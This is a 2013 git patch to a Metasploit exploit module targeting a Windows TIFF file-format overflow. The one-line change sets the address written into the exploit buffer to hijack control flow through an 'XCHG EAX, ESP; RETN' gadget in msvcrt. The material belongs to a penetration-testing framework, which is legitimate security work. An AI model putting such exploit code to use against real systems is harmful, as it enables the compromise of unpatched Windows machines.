From 0079413e81e6ef291aea497be8710527132b6659 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 25 Nov 2013 22:04:02 -0600 Subject: [PATCH] Full revert the change --- modules/exploits/windows/fileformat/mswin_tiff_overflow.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb index 39d01a8a2f..deeddd19e6 100644 --- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb +++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote # Gain control of the call [eax+50h] instruction # XCHG EAX, ESP; RETN msvcrt - buf[0x4874, 4] = [0x12dd0700-0x50].pack('V') + buf[0x4874, 4] = [0x200F0700-0x50].pack('V') buf end